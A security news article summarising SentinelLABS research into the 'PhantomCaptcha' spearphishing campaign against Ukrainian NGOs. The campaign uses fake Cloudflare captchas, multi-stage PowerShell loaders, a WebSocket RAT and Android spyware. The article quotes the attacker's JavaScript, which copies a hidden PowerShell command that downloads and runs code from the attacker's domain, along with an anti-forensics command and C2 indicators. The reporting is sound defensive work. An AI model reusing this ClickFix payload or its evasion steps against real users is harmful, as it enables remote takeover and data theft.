PhantomCaptcha Spyware Targets Ukraine NGOs with Fake Cloudflare Lure to Deploy WebSocket RAT

Researchers from SentinelLABS, in collaboration with the Digital Security Lab of Ukraine, have exposed a coordinated spearphishing campaign aimed at humanitarian organizations and regional government agencies in Ukraine, including the International Red Cross, UNICEF, and the Norwegian Refugee Council. The campaign, dubbed “PhantomCaptcha,” employed fake Cloudflare verification pages and weaponized PDFs to deliver a multi-stage PowerShell-based WebSocket RAT hosted on Russian-owned infrastructure.

“Threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page,” the researchers reported.

According to SentinelLABS, the attacks were launched on October 8, 2025, following nearly six months of infrastructure preparation. Despite this extensive setup, the malicious infrastructure remained active for just one day — a hallmark of strong operational discipline and anti-forensics strategy.

The emails impersonated the Office of the President of Ukraine and distributed an 8-page PDF purporting to be an official government communiqué. When opened, the document contained an embedded link redirecting to zoomconference[.]app, a fake Zoom domain hosted on a VPS registered to Russian provider KVMKA.

“The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway,” SentinelLABS wrote, explaining how the page disguised the malware delivery sequence.

The PhantomCaptcha technique expands on the ClickFix or Paste-and-Run trend observed in previous social engineering attacks. Victims were instructed to copy a “security token” from a fake captcha popup and manually execute it in a Windows Run dialog — effectively tricking users into infecting themselves.

PhantomCaptcha, WebSocket RAT — Custom reCaptcha popup in Ukrainian with “Copy token” button | Image: SentinelLABS

The command executed a PowerShell script silently in the background:

function copyToken(){

//--headless "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Microsoft Windows\SystemHealthSvc.ps1"

let code = `iex ((New-Object System.Net.WebClient).DownloadString(\\"ht\\"+\\"tps://zoomconference.a\\"+\\"pp/cptch/${clientId}\\"));`

navigator.clipboard.writeText("conhost.exe --headless \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \""+ code +"\"")

}

This step downloaded the first-stage PowerShell loader, disguised as a captcha verification routine, and began the multi-stage infection chain.

“This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files,” the analysts emphasized.

SentinelLABS traced the infection process through three PowerShell-based stages, each progressively more obfuscated and stealthy:

Stage 1: Obfuscated Downloader
A 500KB PowerShell script (cptch) downloaded the next stage from bsnowcommunications[.]com/maintenance.
Despite its size, its entire logic was condensed into a single line, hidden under layers of obfuscation to evade signature-based detection. “Using massive obfuscation to obscure simple functionality is likely designed to evade detection and complicate analysis,” the report noted.
Stage 2: Fingerprinting and Encrypted Comms
The next payload performed system reconnaissance, gathering the computer name, domain info, process ID, and hardware UUID. The data was XOR-encrypted and transmitted to the C2 server via an HTTPS request. “The script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis,” researchers added.
Stage 3: WebSocket RAT
The final stage established a WebSocket connection to wss://bsnowcommunications[.]com:80, allowing the attacker to execute arbitrary PowerShell commands remotely, exfiltrate data, and maintain persistence. “The WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host,” the report concluded.

The C2 infrastructure was carefully compartmentalized. The primary domain, zoomconference[.]app, resolved to 193.233.23[.]81 and was active for only 24 hours. A separate backend, bsnowcommunications[.]com (IP 185.142.33[.]131), remains active and is believed to manage long-term control of compromised hosts.

The campaign exhibits overlaps with COLDRIVER, a Russian FSB-linked threat cluster, known for targeting Western NGOs and diplomats via spearphishing campaigns since 2022.

“Our analysis suggests this attack chain has overlaps with activity attributed to COLDRIVER, a Russian FSB-linked threat cluster,” SentinelLABS stated, though attribution remains under investigation.

In a related discovery, researchers identified a mobile attack vector operating from the same infrastructure.
A newly registered domain — princess-mens[.]click — hosted a malicious Android application named princess.apk, masquerading as an adult entertainment app from a club in Lviv, Ukraine.

The APK harvested:

Contact lists and call logs
SIM and device identifiers
Location and Wi-Fi data
Photo galleries and media files

“The application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples,” SentinelLABS wrote.

The inclusion of socially engineered lures like adult content and fake cloud storage tools indicates an attempt to expand surveillance beyond desktops to personal mobile devices of targeted users.

Rate this post

Related Posts:

Found this helpful?

Leave a Reply Cancel reply